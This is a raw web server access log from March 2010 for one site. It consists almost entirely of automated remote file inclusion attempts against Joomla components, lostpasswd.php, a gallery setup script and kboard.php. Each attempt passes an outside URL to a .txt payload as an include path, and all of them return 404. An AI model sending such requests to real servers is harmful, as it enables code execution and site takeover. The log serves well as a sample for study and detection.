87.106.132.3 - - [09/Mar/2010:08:02:17 -0800] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:02:30 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:02:30 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:02:30 -0800] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.227.136.138 - - [09/Mar/2010:08:02:45 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.227.136.138 - - [09/Mar/2010:08:03:12 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.227.136.138 - - [09/Mar/2010:08:03:24 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
118.168.12.94 - - [09/Mar/2010:08:05:03 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
118.168.12.94 - - [09/Mar/2010:08:05:03 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
118.168.12.94 - - [09/Mar/2010:08:05:03 -0800] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
118.168.12.94 - - [09/Mar/2010:08:05:26 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
118.168.12.94 - - [09/Mar/2010:08:05:26 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
118.168.12.94 - - [09/Mar/2010:08:05:26 -0800] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.227.136.138 - - [09/Mar/2010:08:17:39 -0800] "GET /logs/access.log%20%20/lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
67.227.136.138 - - [09/Mar/2010:08:17:39 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
67.227.136.138 - - [09/Mar/2010:08:17:39 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
67.227.136.138 - - [09/Mar/2010:08:17:45 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
67.227.136.138 - - [09/Mar/2010:08:17:45 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
67.227.136.138 - - [09/Mar/2010:08:17:45 -0800] "GET /logs/access.log%20%20/lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
67.227.136.138 - - [09/Mar/2010:08:18:08 -0800] "GET /logs/access.log%20%20/lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
67.227.136.138 - - [09/Mar/2010:08:18:08 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
67.227.136.138 - - [09/Mar/2010:08:18:08 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
76.13.114.105 - - [09/Mar/2010:08:18:44 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:20:53 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:20:53 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:20:53 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
174.133.164.82 - - [09/Mar/2010:08:20:53 -0800] "GET /logs//sirini_simplism_gallery_v4/setup.php?setup[use_category]=1&dir=http://www.hee.edu.vn/css/fid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
174.133.164.82 - - [09/Mar/2010:08:20:53 -0800] "GET /logs/access_100104.log//sirini_simplism_gallery_v4/setup.php?setup[use_category]=1&dir=http://www.hee.edu.vn/css/fid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
174.133.164.82 - - [09/Mar/2010:08:20:53 -0800] "GET /sirini_simplism_gallery_v4/setup.php?setup[use_category]=1&dir=http://www.hee.edu.vn/css/fid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [09/Mar/2010:08:20:57 -0800] "GET /logs/access.log//bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
218.38.243.44 - - [09/Mar/2010:08:21:04 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.sithome.com/technote6/data/r0x-id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:21:28 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:21:28 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:21:28 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:21:28 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:21:28 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:21:28 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:23:00 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:23:00 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:23:00 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
174.133.164.82 - - [09/Mar/2010:08:23:00 -0800] "GET /logs//sirini_simplism_gallery_v4/setup.php?setup[use_category]=1&dir=http://www.hee.edu.vn/css/fid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
174.133.164.82 - - [09/Mar/2010:08:23:00 -0800] "GET /sirini_simplism_gallery_v4/setup.php?setup[use_category]=1&dir=http://www.hee.edu.vn/css/fid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
174.133.164.82 - - [09/Mar/2010:08:23:02 -0800] "GET /logs/access.log//sirini_simplism_gallery_v4/setup.php?setup[use_category]=1&dir=http://www.hee.edu.vn/css/fid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.93.147.154 - - [09/Mar/2010:08:23:21 -0800] "GET /logs/access.log//bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:23:24 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:23:24 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:23:24 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:23:39 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:23:39 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:23:39 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.227.136.138 - - [09/Mar/2010:08:26:06 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
67.227.136.138 - - [09/Mar/2010:08:26:10 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.224.132.89 - - [09/Mar/2010:08:27:03 -0800] "GET /logs/access.log%20%20/lostpasswd.php?env[include_prefix]=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.224.132.89 - - [09/Mar/2010:08:27:04 -0800] "GET /lostpasswd.php?env[include_prefix]=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.224.132.89 - - [09/Mar/2010:08:27:04 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
58.150.99.144 - - [09/Mar/2010:08:27:47 -0800] "GET /logs/access.log%20%20///kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
58.150.99.144 - - [09/Mar/2010:08:27:47 -0800] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
58.150.99.144 - - [09/Mar/2010:08:27:48 -0800] "GET /logs///kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
58.150.99.144 - - [09/Mar/2010:08:27:59 -0800] "GET /logs/access.log%20%20///kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
58.150.99.144 - - [09/Mar/2010:08:27:59 -0800] "GET /logs///kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
58.150.99.144 - - [09/Mar/2010:08:28:00 -0800] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.168.12.152 - - [09/Mar/2010:08:28:02 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.168.12.152 - - [09/Mar/2010:08:28:02 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.168.12.152 - - [09/Mar/2010:08:28:02 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "redneckmba.com"
165.132.30.11 - - [09/Mar/2010:08:28:06 -0800] "GET /logs/access.log%20%20/lostpasswd.php?env[include_prefix]=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
165.132.30.11 - - [09/Mar/2010:08:28:06 -0800] "GET /lostpasswd.php?env[include_prefix]=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
165.132.30.11 - - [09/Mar/2010:08:28:06 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.168.12.152 - - [09/Mar/2010:08:28:20 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.168.12.152 - - [09/Mar/2010:08:28:20 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.168.12.152 - - [09/Mar/2010:08:28:20 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.168.12.152 - - [09/Mar/2010:08:28:23 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
118.168.12.152 - - [09/Mar/2010:08:28:23 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
118.168.12.152 - - [09/Mar/2010:08:28:23 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
174.133.164.82 - - [09/Mar/2010:08:28:39 -0800] "GET /logs//sirini_simplism_gallery_v4/setup.php?setup[use_category]=1&dir=http://www.hee.edu.vn/css/fid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
174.133.164.82 - - [09/Mar/2010:08:28:39 -0800] "GET /sirini_simplism_gallery_v4/setup.php?setup[use_category]=1&dir=http://www.hee.edu.vn/css/fid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
174.133.164.82 - - [09/Mar/2010:08:28:39 -0800] "GET /logs/access.log%20%20//sirini_simplism_gallery_v4/setup.php?setup[use_category]=1&dir=http://www.hee.edu.vn/css/fid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
165.132.30.11 - - [09/Mar/2010:08:28:53 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
165.132.30.11 - - [09/Mar/2010:08:28:53 -0800] "GET /lostpasswd.php?env[include_prefix]=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
165.132.30.11 - - [09/Mar/2010:08:28:53 -0800] "GET /logs/access.log%20%20/lostpasswd.php?env[include_prefix]=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.168.12.152 - - [09/Mar/2010:08:29:05 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
118.168.12.152 - - [09/Mar/2010:08:29:05 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
118.168.12.152 - - [09/Mar/2010:08:29:05 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
95.110.224.127 - - [09/Mar/2010:08:30:18 -0800] "GET /logs//lostpasswd.php?env[include_prefix]=http://www.lpm.mgroup.pl/modules/xoopsgallery/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
174.133.164.82 - - [09/Mar/2010:08:30:40 -0800] "GET /logs/access_091012.log%20%20//sirini_simplism_gallery_v4/setup.php?setup[use_category]=1&dir=http://www.hee.edu.vn/css/fid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
95.110.224.127 - - [09/Mar/2010:08:31:32 -0800] "GET /logs//lostpasswd.php?env[include_prefix]=http://www.lpm.mgroup.pl/modules/xoopsgallery/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
200.93.147.154 - - [09/Mar/2010:08:32:20 -0800] "GET /logs/access.log//bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:32:31 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:32:31 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:32:31 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:32:43 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:32:43 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:32:43 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:32:45 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:32:45 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:32:45 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
95.110.224.127 - - [09/Mar/2010:08:33:13 -0800] "GET /logs//lostpasswd.php?env[include_prefix]=http://www.lpm.mgroup.pl/modules/xoopsgallery/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
118.168.12.152 - - [09/Mar/2010:08:33:31 -0800] "GET /lostpasswd.php?env[include_prefix]=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.168.12.152 - - [09/Mar/2010:08:33:31 -0800] "GET /logs/access.log%20%20/lostpasswd.php?env[include_prefix]=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.168.12.152 - - [09/Mar/2010:08:33:31 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "redneckmba.com"
95.110.224.127 - - [09/Mar/2010:08:33:43 -0800] "GET /logs//lostpasswd.php?env[include_prefix]=http://www.lpm.mgroup.pl/modules/xoopsgallery/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:34:46 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:34:46 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:34:47 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.168.12.152 - - [09/Mar/2010:08:35:41 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
118.168.12.152 - - [09/Mar/2010:08:35:41 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
118.168.12.152 - - [09/Mar/2010:08:35:41 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:35:49 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:35:49 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:35:49 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:35:50 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:35:50 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [09/Mar/2010:08:35:50 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
76.13.123.194 - - [09/Mar/2010:08:35:51 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
